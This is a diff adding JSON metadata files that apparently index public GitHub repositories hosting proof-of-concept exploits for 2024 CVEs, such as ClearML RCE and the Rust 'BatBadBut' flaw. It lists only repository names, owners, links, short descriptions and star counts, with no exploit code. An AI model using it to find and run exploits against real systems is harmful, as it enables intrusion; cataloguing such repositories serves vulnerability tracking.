new file mode 100644
index 0000000000..a89356bf67
--- /dev/null
+++ b/2024/CVE-2024-24142.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 746424150,
+ "name": "CVE-2024-24142",
+ "full_name": "BurakSevben\/CVE-2024-24142",
+ "owner": {
+ "login": "BurakSevben",
+ "id": 117217689,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117217689?v=4",
+ "html_url": "https:\/\/github.com\/BurakSevben"
+ },
+ "html_url": "https:\/\/github.com\/BurakSevben\/CVE-2024-24142",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-22T00:36:05Z",
+ "updated_at": "2024-01-30T23:44:46Z",
+ "pushed_at": "2024-01-31T00:33:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-2432.json b/2024/CVE-2024-2432.json
new file mode 100644
index 0000000000..5ac353b239
--- /dev/null
+++ b/2024/CVE-2024-2432.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 772189617,
+ "name": "CVE-2024-2432-PaloAlto-GlobalProtect-EoP",
+ "full_name": "Hagrid29\/CVE-2024-2432-PaloAlto-GlobalProtect-EoP",
+ "owner": {
+ "login": "Hagrid29",
+ "id": 97426612,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97426612?v=4",
+ "html_url": "https:\/\/github.com\/Hagrid29"
+ },
+ "html_url": "https:\/\/github.com\/Hagrid29\/CVE-2024-2432-PaloAlto-GlobalProtect-EoP",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-14T17:48:49Z",
+ "updated_at": "2024-06-21T00:12:12Z",
+ "pushed_at": "2024-03-14T17:49:48Z",
+ "stargazers_count": 54,
+ "watchers_count": 54,
+ "has_discussions": false,
+ "forks_count": 15,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 15,
+ "watchers": 54,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24336.json b/2024/CVE-2024-24336.json
new file mode 100644
index 0000000000..f698dcc086
--- /dev/null
+++ b/2024/CVE-2024-24336.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 753635394,
+ "name": "CVE-2024-24336",
+ "full_name": "nitipoom-jar\/CVE-2024-24336",
+ "owner": {
+ "login": "nitipoom-jar",
+ "id": 149907798,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4",
+ "html_url": "https:\/\/github.com\/nitipoom-jar"
+ },
+ "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2024-24336",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-06T14:10:02Z",
+ "updated_at": "2024-02-06T14:55:25Z",
+ "pushed_at": "2024-02-06T15:01:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24337.json b/2024/CVE-2024-24337.json
new file mode 100644
index 0000000000..1aad080d29
--- /dev/null
+++ b/2024/CVE-2024-24337.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 753703913,
+ "name": "CVE-2024-24337",
+ "full_name": "nitipoom-jar\/CVE-2024-24337",
+ "owner": {
+ "login": "nitipoom-jar",
+ "id": 149907798,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4",
+ "html_url": "https:\/\/github.com\/nitipoom-jar"
+ },
+ "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2024-24337",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-06T16:33:13Z",
+ "updated_at": "2024-02-06T16:33:45Z",
+ "pushed_at": "2024-02-06T16:33:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24386.json b/2024/CVE-2024-24386.json
new file mode 100644
index 0000000000..9cf94a33e1
--- /dev/null
+++ b/2024/CVE-2024-24386.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 755087413,
+ "name": "CVE-2024-24386",
+ "full_name": "erick-duarte\/CVE-2024-24386",
+ "owner": {
+ "login": "erick-duarte",
+ "id": 59427098,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59427098?v=4",
+ "html_url": "https:\/\/github.com\/erick-duarte"
+ },
+ "html_url": "https:\/\/github.com\/erick-duarte\/CVE-2024-24386",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-09T12:22:08Z",
+ "updated_at": "2024-02-21T21:16:43Z",
+ "pushed_at": "2024-02-15T13:58:50Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24396.json b/2024/CVE-2024-24396.json
new file mode 100644
index 0000000000..475cf560ea
--- /dev/null
+++ b/2024/CVE-2024-24396.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 752985066,
+ "name": "CVE-2024-24396",
+ "full_name": "trustcves\/CVE-2024-24396",
+ "owner": {
+ "login": "trustcves",
+ "id": 119938735,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119938735?v=4",
+ "html_url": "https:\/\/github.com\/trustcves"
+ },
+ "html_url": "https:\/\/github.com\/trustcves\/CVE-2024-24396",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-05T08:43:33Z",
+ "updated_at": "2024-02-05T08:43:33Z",
+ "pushed_at": "2024-02-05T09:02:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24397.json b/2024/CVE-2024-24397.json
new file mode 100644
index 0000000000..10c82bcbb9
--- /dev/null
+++ b/2024/CVE-2024-24397.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 752995551,
+ "name": "CVE-2024-24397",
+ "full_name": "trustcves\/CVE-2024-24397",
+ "owner": {
+ "login": "trustcves",
+ "id": 119938735,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119938735?v=4",
+ "html_url": "https:\/\/github.com\/trustcves"
+ },
+ "html_url": "https:\/\/github.com\/trustcves\/CVE-2024-24397",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-05T09:08:34Z",
+ "updated_at": "2024-02-11T09:13:35Z",
+ "pushed_at": "2024-02-05T09:20:33Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24398.json b/2024/CVE-2024-24398.json
new file mode 100644
index 0000000000..c9393b1550
--- /dev/null
+++ b/2024/CVE-2024-24398.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 752998286,
+ "name": "CVE-2024-24398",
+ "full_name": "trustcves\/CVE-2024-24398",
+ "owner": {
+ "login": "trustcves",
+ "id": 119938735,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119938735?v=4",
+ "html_url": "https:\/\/github.com\/trustcves"
+ },
+ "html_url": "https:\/\/github.com\/trustcves\/CVE-2024-24398",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-05T09:15:17Z",
+ "updated_at": "2024-02-05T09:15:17Z",
+ "pushed_at": "2024-02-05T09:19:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24401.json b/2024/CVE-2024-24401.json
new file mode 100644
index 0000000000..c91c099bc7
--- /dev/null
+++ b/2024/CVE-2024-24401.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 759519319,
+ "name": "CVE-2024-24401",
+ "full_name": "MAWK0235\/CVE-2024-24401",
+ "owner": {
+ "login": "MAWK0235",
+ "id": 90433993,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90433993?v=4",
+ "html_url": "https:\/\/github.com\/MAWK0235"
+ },
+ "html_url": "https:\/\/github.com\/MAWK0235\/CVE-2024-24401",
+ "description": "Auto exploitation tool for CVE-2024-24401. ",
+ "fork": false,
+ "created_at": "2024-02-18T20:05:46Z",
+ "updated_at": "2024-03-27T02:03:29Z",
+ "pushed_at": "2024-02-26T22:25:54Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24402.json b/2024/CVE-2024-24402.json
new file mode 100644
index 0000000000..00fddd344d
--- /dev/null
+++ b/2024/CVE-2024-24402.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 759526495,
+ "name": "CVE-2024-24402",
+ "full_name": "MAWK0235\/CVE-2024-24402",
+ "owner": {
+ "login": "MAWK0235",
+ "id": 90433993,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90433993?v=4",
+ "html_url": "https:\/\/github.com\/MAWK0235"
+ },
+ "html_url": "https:\/\/github.com\/MAWK0235\/CVE-2024-24402",
+ "description": "Priv esc in Nagios 2024R1.01",
+ "fork": false,
+ "created_at": "2024-02-18T20:33:28Z",
+ "updated_at": "2024-03-27T02:02:51Z",
+ "pushed_at": "2024-02-18T20:37:55Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24409.json b/2024/CVE-2024-24409.json
new file mode 100644
index 0000000000..05a6698c17
--- /dev/null
+++ b/2024/CVE-2024-24409.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 777430748,
+ "name": "CVE-2024-24409",
+ "full_name": "passtheticket\/CVE-2024-24409",
+ "owner": {
+ "login": "passtheticket",
+ "id": 76125965,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76125965?v=4",
+ "html_url": "https:\/\/github.com\/passtheticket"
+ },
+ "html_url": "https:\/\/github.com\/passtheticket\/CVE-2024-24409",
+ "description": "ADManager Plus Build < 7210 Elevation of Privilege Vulnerability",
+ "fork": false,
+ "created_at": "2024-03-25T20:51:56Z",
+ "updated_at": "2024-06-07T21:09:48Z",
+ "pushed_at": "2024-04-25T18:24:54Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24488.json b/2024/CVE-2024-24488.json
new file mode 100644
index 0000000000..9b7de895be
--- /dev/null
+++ b/2024/CVE-2024-24488.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 751143948,
+ "name": "CVE-2024-24488",
+ "full_name": "minj-ae\/CVE-2024-24488",
+ "owner": {
+ "login": "minj-ae",
+ "id": 65323308,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65323308?v=4",
+ "html_url": "https:\/\/github.com\/minj-ae"
+ },
+ "html_url": "https:\/\/github.com\/minj-ae\/CVE-2024-24488",
+ "description": "An issue in Shenzen Tenda Technology CP3V2.0 V11.10.00.2311090948 allows a local attacker to obtain sensitive information via the password component.",
+ "fork": false,
+ "created_at": "2024-02-01T02:29:19Z",
+ "updated_at": "2024-04-29T01:38:24Z",
+ "pushed_at": "2024-02-07T21:22:27Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24520.json b/2024/CVE-2024-24520.json
new file mode 100644
index 0000000000..3b612c03a4
--- /dev/null
+++ b/2024/CVE-2024-24520.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 759242372,
+ "name": "CVE-2024-24520",
+ "full_name": "xF-9979\/CVE-2024-24520",
+ "owner": {
+ "login": "xF-9979",
+ "id": 108913864,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108913864?v=4",
+ "html_url": "https:\/\/github.com\/xF-9979"
+ },
+ "html_url": "https:\/\/github.com\/xF-9979\/CVE-2024-24520",
+ "description": "Arbitrary code execution vulnerability",
+ "fork": false,
+ "created_at": "2024-02-18T03:13:53Z",
+ "updated_at": "2024-03-17T07:58:21Z",
+ "pushed_at": "2024-03-17T07:58:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24576.json b/2024/CVE-2024-24576.json
new file mode 100644
index 0000000000..3126d23a79
--- /dev/null
+++ b/2024/CVE-2024-24576.json
@@ -0,0 +1,277 @@
+[
+ {
+ "id": 784438166,
+ "name": "CVE-2024-24576-PoC",
+ "full_name": "frostb1ten\/CVE-2024-24576-PoC",
+ "owner": {
+ "login": "frostb1ten",
+ "id": 68353531,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68353531?v=4",
+ "html_url": "https:\/\/github.com\/frostb1ten"
+ },
+ "html_url": "https:\/\/github.com\/frostb1ten\/CVE-2024-24576-PoC",
+ "description": "Example of CVE-2024-24576 use case.",
+ "fork": false,
+ "created_at": "2024-04-09T21:17:15Z",
+ "updated_at": "2024-06-25T03:32:34Z",
+ "pushed_at": "2024-04-10T14:46:42Z",
+ "stargazers_count": 50,
+ "watchers_count": 50,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 50,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 784676322,
+ "name": "CVE-2024-24576-PoC-Python",
+ "full_name": "brains93\/CVE-2024-24576-PoC-Python",
+ "owner": {
+ "login": "brains93",
+ "id": 60553334,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60553334?v=4",
+ "html_url": "https:\/\/github.com\/brains93"
+ },
+ "html_url": "https:\/\/github.com\/brains93\/CVE-2024-24576-PoC-Python",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-10T10:27:55Z",
+ "updated_at": "2024-04-14T16:16:52Z",
+ "pushed_at": "2024-04-12T09:22:40Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 784763809,
+ "name": "CVE-2024-24576-Exploit",
+ "full_name": "aydinnyunus\/CVE-2024-24576-Exploit",
+ "owner": {
+ "login": "aydinnyunus",
+ "id": 52822869,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52822869?v=4",
+ "html_url": "https:\/\/github.com\/aydinnyunus"
+ },
+ "html_url": "https:\/\/github.com\/aydinnyunus\/CVE-2024-24576-Exploit",
+ "description": "CVE-2024-24576 Proof of Concept",
+ "fork": false,
+ "created_at": "2024-04-10T14:06:09Z",
+ "updated_at": "2024-05-29T09:18:10Z",
+ "pushed_at": "2024-04-10T14:42:34Z",
+ "stargazers_count": 19,
+ "watchers_count": 19,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "1-day",
+ "exploit",
+ "rust",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 19,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 785163065,
+ "name": "CVE-2024-24576-PoC---Nim",
+ "full_name": "foxoman\/CVE-2024-24576-PoC---Nim",
+ "owner": {
+ "login": "foxoman",
+ "id": 5356677,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5356677?v=4",
+ "html_url": "https:\/\/github.com\/foxoman"
+ },
+ "html_url": "https:\/\/github.com\/foxoman\/CVE-2024-24576-PoC---Nim",
+ "description": "CVE-2024-24576 PoC for Nim Lang",
+ "fork": false,
+ "created_at": "2024-04-11T10:22:10Z",
+ "updated_at": "2024-04-11T10:39:04Z",
+ "pushed_at": "2024-04-11T11:27:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 785926402,
+ "name": "batbadbut-demo",
+ "full_name": "corysabol\/batbadbut-demo",
+ "owner": {
+ "login": "corysabol",
+ "id": 4594324,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4594324?v=4",
+ "html_url": "https:\/\/github.com\/corysabol"
+ },
+ "html_url": "https:\/\/github.com\/corysabol\/batbadbut-demo",
+ "description": "This is a simple demo for the BadBatBut vulnerability CVE-2024-24576",
+ "fork": false,
+ "created_at": "2024-04-12T23:36:05Z",
+ "updated_at": "2024-04-26T12:20:52Z",
+ "pushed_at": "2024-04-18T04:24:32Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786291689,
+ "name": "CVE-2024-24576-PoC-Python",
+ "full_name": "mishalhossin\/CVE-2024-24576-PoC-Python",
+ "owner": {
+ "login": "mishalhossin",
+ "id": 91066601,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91066601?v=4",
+ "html_url": "https:\/\/github.com\/mishalhossin"
+ },
+ "html_url": "https:\/\/github.com\/mishalhossin\/CVE-2024-24576-PoC-Python",
+ "description": "https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2024-24576",
+ "fork": false,
+ "created_at": "2024-04-14T02:10:55Z",
+ "updated_at": "2024-05-12T07:54:52Z",
+ "pushed_at": "2024-04-14T02:30:36Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 786321565,
+ "name": "CVE-2024-24576.jl",
+ "full_name": "lpn\/CVE-2024-24576.jl",
+ "owner": {
+ "login": "lpn",
+ "id": 619560,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/619560?v=4",
+ "html_url": "https:\/\/github.com\/lpn"
+ },
+ "html_url": "https:\/\/github.com\/lpn\/CVE-2024-24576.jl",
+ "description": "Simple CVE-2024-24576 PoC in Julia",
+ "fork": false,
+ "created_at": "2024-04-14T05:00:18Z",
+ "updated_at": "2024-04-14T07:51:08Z",
+ "pushed_at": "2024-04-14T08:39:09Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 789510981,
+ "name": "CVE-2024-24576-PoC-Rust",
+ "full_name": "Gaurav1020\/CVE-2024-24576-PoC-Rust",
+ "owner": {
+ "login": "Gaurav1020",
+ "id": 81969930,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81969930?v=4",
+ "html_url": "https:\/\/github.com\/Gaurav1020"
+ },
+ "html_url": "https:\/\/github.com\/Gaurav1020\/CVE-2024-24576-PoC-Rust",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-20T18:54:00Z",
+ "updated_at": "2024-04-20T18:59:01Z",
+ "pushed_at": "2024-04-20T18:58:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 789761052,
+ "name": "CVE-2024-24576-PoC-BatBadBut",
+ "full_name": "SheL3G\/CVE-2024-24576-PoC-BatBadBut",
+ "owner": {
+ "login": "SheL3G",
+ "id": 76014923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76014923?v=4",
+ "html_url": "https:\/\/github.com\/SheL3G"
+ },
+ "html_url": "https:\/\/github.com\/SheL3G\/CVE-2024-24576-PoC-BatBadBut",
+ "description": "PoC for CVE-2024-24576 vulnerability \"BatBadBut\"",
+ "fork": false,
+ "created_at": "2024-04-21T13:42:28Z",
+ "updated_at": "2024-04-21T17:57:34Z",
+ "pushed_at": "2024-04-21T17:57:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24590.json b/2024/CVE-2024-24590.json
new file mode 100644
index 0000000000..373d8ab665
--- /dev/null
+++ b/2024/CVE-2024-24590.json
@@ -0,0 +1,182 @@
+[
+ {
+ "id": 813761890,
+ "name": "ClearML-vulnerability-exploit-RCE-2024-CVE-2024-24590-",
+ "full_name": "LordVileOnX\/ClearML-vulnerability-exploit-RCE-2024-CVE-2024-24590-",
+ "owner": {
+ "login": "LordVileOnX",
+ "id": 172425960,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172425960?v=4",
+ "html_url": "https:\/\/github.com\/LordVileOnX"
+ },
+ "html_url": "https:\/\/github.com\/LordVileOnX\/ClearML-vulnerability-exploit-RCE-2024-CVE-2024-24590-",
+ "description": "Here is an exploit in python to exploit the CVE-2024-24590, which is an upload pickle in a ClearML, which leads to arbitrary code execution... Enjoy :D",
+ "fork": false,
+ "created_at": "2024-06-11T17:33:36Z",
+ "updated_at": "2024-06-13T19:24:17Z",
+ "pushed_at": "2024-06-11T23:10:10Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 813864710,
+ "name": "ClearML-CVE-2024-24590",
+ "full_name": "OxyDeV2\/ClearML-CVE-2024-24590",
+ "owner": {
+ "login": "OxyDeV2",
+ "id": 46215222,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46215222?v=4",
+ "html_url": "https:\/\/github.com\/OxyDeV2"
+ },
+ "html_url": "https:\/\/github.com\/OxyDeV2\/ClearML-CVE-2024-24590",
+ "description": "Proof of concept for CVE-2024-24590",
+ "fork": false,
+ "created_at": "2024-06-11T22:30:26Z",
+ "updated_at": "2024-06-14T20:13:28Z",
+ "pushed_at": "2024-06-13T11:33:29Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 814218929,
+ "name": "CVE-2024-24590",
+ "full_name": "DemonPandaz2763\/CVE-2024-24590",
+ "owner": {
+ "login": "DemonPandaz2763",
+ "id": 69938676,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69938676?v=4",
+ "html_url": "https:\/\/github.com\/DemonPandaz2763"
+ },
+ "html_url": "https:\/\/github.com\/DemonPandaz2763\/CVE-2024-24590",
+ "description": "Another CVE-2024-24590 poc",
+ "fork": false,
+ "created_at": "2024-06-12T15:07:46Z",
+ "updated_at": "2024-06-12T15:12:54Z",
+ "pushed_at": "2024-06-12T15:12:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 814871568,
+ "name": "CVE-2024-24590-ClearML-RCE-Exploit",
+ "full_name": "xffsec\/CVE-2024-24590-ClearML-RCE-Exploit",
+ "owner": {
+ "login": "xffsec",
+ "id": 162821824,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162821824?v=4",
+ "html_url": "https:\/\/github.com\/xffsec"
+ },
+ "html_url": "https:\/\/github.com\/xffsec\/CVE-2024-24590-ClearML-RCE-Exploit",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-13T22:17:57Z",
+ "updated_at": "2024-06-14T00:16:10Z",
+ "pushed_at": "2024-06-13T22:20:15Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 815490192,
+ "name": "CVE-2024-24590-ClearML-RCE-CMD-POC",
+ "full_name": "diegogarciayala\/CVE-2024-24590-ClearML-RCE-CMD-POC",
+ "owner": {
+ "login": "diegogarciayala",
+ "id": 84715095,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84715095?v=4",
+ "html_url": "https:\/\/github.com\/diegogarciayala"
+ },
+ "html_url": "https:\/\/github.com\/diegogarciayala\/CVE-2024-24590-ClearML-RCE-CMD-POC",
+ "description": "CVE-2024-24590 ClearML RCE&CMD POC",
+ "fork": false,
+ "created_at": "2024-06-15T10:09:51Z",
+ "updated_at": "2024-06-17T09:25:35Z",
+ "pushed_at": "2024-06-15T11:09:13Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 817754834,
+ "name": "CVE-2024-24590",
+ "full_name": "junnythemarksman\/CVE-2024-24590",
+ "owner": {
+ "login": "junnythemarksman",
+ "id": 20056452,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20056452?v=4",
+ "html_url": "https:\/\/github.com\/junnythemarksman"
+ },
+ "html_url": "https:\/\/github.com\/junnythemarksman\/CVE-2024-24590",
